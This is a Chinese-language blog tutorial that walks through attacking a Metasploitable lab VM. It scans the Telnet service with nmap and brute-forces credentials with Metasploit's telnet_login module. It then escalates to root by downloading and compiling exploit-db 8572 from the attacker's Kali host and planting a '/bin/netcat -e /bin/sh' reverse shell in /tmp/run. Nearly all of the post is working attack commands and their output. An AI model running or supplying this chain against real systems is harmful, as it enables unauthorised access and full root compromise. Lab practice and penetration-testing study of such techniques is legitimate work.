Metasploit实战:Telnet暴破和提权
2019-07-11 本文已影响0人
DreamsonMa
Telnet是一个明文传送协议,它将用户的所有内容,包括用户名和密码都明文在互联网上传送,具有一定的安全隐患,因此许多服务器都会选择禁用Telnet服务
Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。
虽然Telnet较为简单实用也很方便,但是在格外注重安全的现代网络技术中,Telnet并不被重用。原因在于Telnet是一个明文传送协议,它将用户的所有内容,包括用户名和密码都明文在互联网上传送,具有一定的安全隐患,因此许多服务器都会选择禁用Telnet服务。如果我们要使用Telnet的远程登录,使用前应在远端服务器上检查并设置允许Telnet服务的功能。
Telnet服务端默认情况下使用23端口。
Telnet版本获取
利用Telnet漏洞,首先需要了解主机信息,软件版本信息。从下面探测结果,可以看出是一台linux机器。
➜ ~ nmap -p23 -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:42 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds
Telnet密码破解
下面使用metasploit对telnet进行用户名和密码的破解。
1、登录msfconsole
➜ ~ msfconsole
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
msf5 >
2、使用search telnet进行查询telnet可以利用的模块
msf5 > search telnet
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal No D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/cisco/ios_telnet_rocem 2017-03-17 normal No Cisco IOS Telnet Denial of Service
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal No Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
auxiliary/scanner/telnet/brocade_enable_login normal Yes Brocade Enable Login Check Scanner
auxiliary/scanner/telnet/lantronix_telnet_password normal Yes Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version normal Yes Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/satel_cmd_exec 2017-04-07 normal Yes Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
auxiliary/scanner/telnet/telnet_encrypt_overflow normal Yes Telnet Service Encryption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login normal Yes Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom normal Yes RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version normal Yes Telnet Service Banner Detection
auxiliary/server/capture/telnet normal No Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution
exploit/linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection
exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection
exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution
exploit/linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution
exploit/linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable
exploit/linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass
exploit/unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution
exploit/unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass
exploit/unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping 2004-11-11 average Yes CCProxy Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow
payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote normal No Windows Gather mRemote Saved Password Extraction
3、选择一个暴力破解辅助(auxiliary),并设置好相应参数
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/telnet/telnet_login) > set USER
set USERNAME set USERPASS_FILE set USER_AS_PASS set USER_FILE
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
USERPASS_FILE => /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set THREADS 5
THREADS => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 auxiliary(scanner/telnet/telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 23 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
4、最后进行破解,并连接上session
msf5 auxiliary(scanner/telnet/telnet_login) > run
[!] 10.0.2.5:23 - No active DB -- Credential data will not be saved!
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:root (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: test:test (Incorrect: )
[+] 10.0.2.5:23 - 10.0.2.5:23 - Login Successful: msfadmin:msfadmin
[*] 10.0.2.5:23 - Attempting to start session 10.0.2.5:23 with msfadmin:msfadmin
[*] Command shell session 1 opened (10.0.2.12:34457 -> 10.0.2.5:23) at 2019-07-11 00:46:41 -0400
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:matrix (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: ghost:ghost (Incorrect: )
[-] 10.0.2.5:23 - 10.0.2.5:23 - LOGIN FAILED: root:sleeper (Incorrect: )
^C[*] 10.0.2.5:23 - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell TELNET msfadmin:msfadmin (10.0.2.5:23) 10.0.2.12:34457 -> 10.0.2.5:23 (10.0.2.5)
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -i 1
[*] Starting interaction with 1...
id
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$
登录提权
感觉拿到的shell权限太弱,那下面我们就验证下如何提权。
1、Kali下载提权工具exp,并启动Http服务。
➜ ~ cd /var/www/html
➜ ~ wget http://www.exploit-db.com/download/8572
➜ ~ systemctl start nginx
2、Kali中启动NC监听
➜ ~ nc -lvp 4444
listening on [any] 4444 ...
3、通过上面拿到的目标主机shell下载exp
msfadmin@metasploitable:~$ wget http://10.0.2.12/8572
wget http://10.0.2.12/8572
--09:18:28-- http://10.0.2.12/8572
=> `8572'
Connecting to 10.0.2.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,876 (2.8K) [application/octet-stream]
100%[====================================>] 2,876 --.--K/s
09:18:28 (561.72 KB/s) - `8572' saved [2876/2876]
4、万事俱备,开始提权
使用gcc编译exp,设置提权脚本,最后执行exp。
exp参数:具有root权限的pid -1
msfadmin@metasploitable:~$ mv 8572 8572.c
mv 8572 8572.c
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ gcc 8572.c -o exploit
gcc 8572.c -o exploit
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run
echo '#!/bin/sh' > /tmp/run
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
<echo '/bin/netcat -e /bin/sh 10.0.2.12 4444' >> /tmp/run
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ ps -edf |grep udev
ps -edf |grep udev
root 2302 1 0 08:48 ? 00:00:00 /sbin/udevd --daemon
msfadmin 4847 4844 0 09:44 pts/1 00:00:00 grep udev
msfadmin@metasploitable:~$ chmod +x exploit
chmod +x exploit
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ ./exploit 2301
./exploit 2301
msfadmin@metasploitable:~$
5、查看Kali中NC监听结果
➜ ~ nc -lvp 4444
listening on [any] 4444 ...
id
10.0.2.5: inverse host lookup failed: Unknown host
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.5] 50536
uid=0(root) gid=0(root)
推荐汇总贴: 漏洞利用套路汇总
